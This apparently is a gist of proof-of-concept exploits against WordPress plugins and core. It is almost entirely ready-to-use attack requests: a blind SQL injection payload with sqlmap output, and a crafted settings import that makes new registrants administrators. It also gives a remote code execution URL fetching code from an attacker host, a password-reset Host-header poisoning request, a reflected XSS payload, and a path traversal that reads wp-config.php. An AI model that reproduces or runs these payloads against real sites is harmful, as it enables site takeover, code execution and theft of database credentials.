@pikpikcu
Last active April 22, 2024 13:41
POC WP

WordPress Plugin - Google Review Slider 6.1 SQL Injection

POC:

GET /wp-admin/admin.php?page=wp_google-templates_posts&tid=1&_wpnonce=***&taction=edit HTTP/1.1

sqlmap result:

sqlmap identified the following injection point(s) with a total of 62 HTTP(s) requests:
---
Parameter: tid (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: page=wp_google-templates_posts&tid=1 AND (SELECT 5357 FROM (SELECT(SLEEP(5)))kHQz)&_wpnonce=***&taction=edit

WordPress Plugin - Easy WP SMTP

File poc.txt:

a:2:{s:4:"data";s:81:"a:2:{s:18:"users_can_register";s:1:"1";s:12:"default_role";s:13:"administrator";}";s:8:"checksum";s:32:"3ce5fb6d7b1dbd6252f4b5b3526650c8";}

Exploit POC:

$ curl https://REDACTED/wp-admin/admin-ajax.php -F 'action=swpsmtp_clear_log' -F 'swpsmtp_import_settings=1' -F 'swpsmtp_import_settings_file=@poc.txt'

WordPress Plugin - Social Warfare <= 3.5.2 RCE

POC:

http://REDACTED/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://ATTACKER/code.txt&wpaa=phpinfo();

CVE-2017-6514

POC:

http://REDACTED/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fevil.com%2F&format=xml

CVE-2017-8295

POC:

curl -v 'http://REDACTED/wp-login.php?action=lostpassword' -H 'Host: vulnspy.com' --data 'user_login=admin&redirect_to=&wp-submit=Get+New+Password'

POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
Host: injected-attackers-mxserver.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

user_login=admin&redirect_to=&wp-submit=Get+New+Password

CVE-2019-19133

POC:

http://redacted/?csshero_action=edit_page&rand=1015&foo%22%3E%3C/iframe%3E%3Cscript%3Ealert(%27Reflected%20XSS%20in%20CSS%20Hero%204.0.3%27)%3C/script%3E%3Ciframe%3Ebar

WordPress 5.1.1 Slider Revolution 4.6.5 UpdateCaptionsCSS Remote Content Injection

POC:

http://redacted/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php